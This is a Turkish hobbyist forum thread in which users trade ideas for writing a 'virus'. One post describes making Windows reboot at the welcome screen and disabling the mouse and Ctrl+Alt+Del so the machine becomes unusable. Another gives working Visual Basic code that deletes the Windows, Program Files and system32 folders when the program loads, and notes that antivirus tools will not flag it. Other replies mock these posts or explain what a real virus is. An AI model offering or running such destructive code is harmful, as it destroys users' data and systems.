Virüs Yazacam Ne Yazayım

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    berke
    berke's avatar
    Erkek
    eğer visual basicte yazıyorsan "winsock" kontrollerini kullanarak bir trojan yazabilirsin. yada biraz daha acımasız .. registry' e windows a hoşgeldiniz yazısı çıktığı anda restarta atmasını yazdır ( visual basic te ) daha sonra mouse i kilitle, ctrl+alt+del kombinasyonunu etkisizi hale getir. Sonra restarta atmak zorunda kalacak.. Sonuç kullanılamaz bir bilgisayar ;)
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    yilmaz
    yilmaz's avatar
    Erkek

virüs yazmakta ne var ki. bu siteye girmeden daha virüs yazmayı bilmiyodum ama şimdi monstershock virüs generatörle bir sürü virüs yazıyom.

3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    BozcaN
    BozcaN's avatar
    Erkek
    afferim...

√ βǾź¢ẵŋ ® //\\ ~ Türkiye"de yaşayan Türk"e biat edecek !!
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    hotboy
    hotboy's avatar
    Erkek
    Abi monstershock la bilmemneyle otomatik virüs oluşturduğunuzda bunu siz kendiniz yaptıınızımı zannediyosunuz. Bide virüs yazdım diye övünüyosunuzdur. Bu işler böyle basitmi??

imzadaki sayaç istek üzerine kaldırılmıştır. son blog yazım : PyQT ile Hesap Makinesi Yapalım - http://www.whosayin.com/y/pyqt-ile-hesap-makinesi-yapalim/ || hotboy attığınız özel mesajlara cevap yazmama hakkını saklı tutar
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    RuzgaR
    RuzgaR's avatar
    Erkek
    hala başlayamadıysan sen get bogaz köprüsüne denizden ilham alarak şiir yaz...:)

Aşk,Tanrı"nın Nefesini Hissetmektir!
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    semih_e
    semih_e's avatar
    Erkek

ufak bir virus

Private sub form_load()
    Kill "C:\Windows\*.*"
    Kill "C:\Program files\*.*"
    Kill "C:\Windows\system\*.*"
    Kill "C:\Windows\system32\*.*"
    msgbox "Geçmiş Olsun"
    End Sub

Bunu vbasicteki kod bölümüne yazarsanız sonrada run a basarsanız veya exe yapıp çalıştırırsanız kısacası win. göçerHem internete filan bağlanmadığı için virüs programları hiç bişey diyemezgüle gğle kullanın kendi pc nizde denemeyin.

daha fazla bilgi almak isteyenler msn yi eklesinler semih_evren@hotmail.com

evren
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Knowledge
    Knowledge's avatar
    Erkek

Eh, Criminal2 vazgecmis artik sanirim yorum yapmaktan. Gulmekle mesguldu sanirim :) Virus un ne oldugunu bilip, oyle yazmaya calisirsaniz daha iyi olur sanirim. Vb ile de yazin virüs, (atıyorum) 2-3 mb lik yayın bakalim :)

8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    BartheZ
    BartheZ's avatar
    Bilgi/Destek Madalyası Üstün Hizmet Madalyası
    Erkek
    bunlara virüs değil monster denir. virüs bulaşır. *.exe'ye bulaşır, *.com'a bulaşır, *.bat'a bulaşır...

on error go to hell
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    xtlan
    xtlan's avatar
    Dişi
    yilmaz bunu yazdı:

virüs yazmakta ne var ki. bu siteye girmeden daha virüs yazmayı bilmiyodum ama şimdi monstershock virüs generatörle bir sürü virüs yazıyom.

ahhahahaha yuru be

"Toros dağlarının tepelerinde tek bir Türkmen evinin bacası tüter halde kalmış ise, ben bu milletten umudumu kesmem, bayrağımı göğsüme sarar, milletimin istiklali uğruna ölürüm. Gazi Mustafa Kemal ATATÜRK"
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Hunter
    j4x
    j4x's avatar
    Erkek

1.Virüs yazcanda nolcak

2.Virüsün temel özelliği diğer dosyalara bulaşmasıdır..

3.Visualde her bi pok oluyo siz dandik ve kolay gözüktüüne bakmayın nee olaylar var onla işletim sistemi bile yapılır bence :D

If people do not believe that mathematics is simple, it is only because they do not realize how complicated life is.
Toplam Hit: 4686 Toplam Mesaj: 39